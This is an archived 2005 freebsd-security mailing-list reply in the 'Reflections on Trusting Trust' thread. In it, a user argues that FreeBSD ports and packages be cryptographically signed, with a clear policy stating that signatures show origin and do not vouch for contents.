From owner-freebsd-security@FreeBSD.ORG Wed Nov 30 15:02:16 2005 Return-Path: X-Original-To: freebsd-security@freebsd.org Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 09AE716A420 for ; Wed, 30 Nov 2005 15:02:16 +0000 (GMT) (envelope-from suporte@wahtec.com.br) Received: from galois.wahtec.com.br (galois.wahtec.com.br [200.96.65.150]) by mx1.FreeBSD.org (Postfix) with ESMTP id B02D743D6B for ; Wed, 30 Nov 2005 15:01:47 +0000 (GMT) (envelope-from suporte@wahtec.com.br) Received: (qmail 48913 invoked by uid 98); 30 Nov 2005 15:05:41 -0000 Received: from 127.0.0.1 by brasil.intranet (envelope-from , uid 1024) with qmail-scanner-1.24 (f-prot: 4.4.7/3.14.13. spamassassin: 2.63. Clear:RC:1(127.0.0.1):. Processed in 0.11006 secs); 30 Nov 2005 15:05:41 -0000 X-Qmail-Scanner-Mail-From: suporte@wahtec.com.br via brasil.intranet X-Qmail-Scanner: 1.24 (Clear:RC:1(127.0.0.1):. Processed in 0.11006 secs) Received: from unknown (HELO rickderringer) (arisjr@unknown) by unknown with SMTP; 30 Nov 2005 15:05:41 -0000 Message-ID: <008a01c5f5be$f6ff3940$e403000a@rickderringer> From: "aristeu" To: "Kris Kennaway" References: <20051129120151.5A2FB16A420@hub.freebsd.org> <002601c5f4fa$b5115320$e403000a@rickderringer> <20051129232703.GA60060@xor.obsecurity.org> <438CE78F.303@freebsd.org> <20051130000552.GB60924@xor.obsecurity.org> <438D0961.40307@freebsd.org> <20051130032459.GA63255@xor.obsecurity.org> Date: Wed, 30 Nov 2005 13:01:38 -0200 MIME-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1"; reply-type=original Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2900.2180 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 Cc: freebsd-security@freebsd.org Subject: Re: Reflections on Trusting Trust X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 30 Nov 2005 15:02:16 -0000 >> Yes and no. Fixing other potential security risks is good, but not if >> it leads users to think that the packages are more trustworthy than they >> really are. In particular, if we started distributing signed packages, >> I suspect that most people would assume that the signatures guaranteed >> that the packages were good, rather than simply ensuring that the >> packages >> hadn't been modified with after they were built. >> >> If we're going to sign anything, we need to ensure not just that we're >> signing what we think we're signing, but also that we're signing what the >> *end users* think that we're signing. > >Seems to me that ignorance and a false sense of security is bad >wherever it appears, so all we can do is try our best to educate users >about what they're getting. I think that with a clear policy the ports and packages could be singned. Something like a banner during installation of a port "This key ensures that this port was made/arranged by an official freebsd port mantainer. The freebsd security team does not take responsability for its contents since it was not scrutinized by them. Good luck!", or, for packages, a similar message saying the package was built on freebsd infrastructure, but the freebsd team don`t take responsability fot its contents, bla, bla... I don't know what kind of authentication with port mantainers do you have, but I think between you guys and the port mantainers must exist some good scheme. This part is OK. now is just the freebsd server and end users part. Sign it with a "ports system" secret key, and a public key pre-installed on clients. The secret key well guarded on ports system core... Simple as that, it can mitigate some problems. I realy dont think signing things ensure that a port or package is secure, but but makes a hell of a better job proving that it came from where it saids it came than loose hashes. Other than that, "security by omission", if exists this, won't solve anything. I know the freebsd-update and portsnap (potsnap I just discovered in this thread) solutions are good. I'm wishing this to be the freebsd standard. I don't wanna push things, and I know things don't work this way. I just wanned to show an end user opinion, on the reflections topic... :) that said, I'm gone.... Thanks and best regards, --aristeu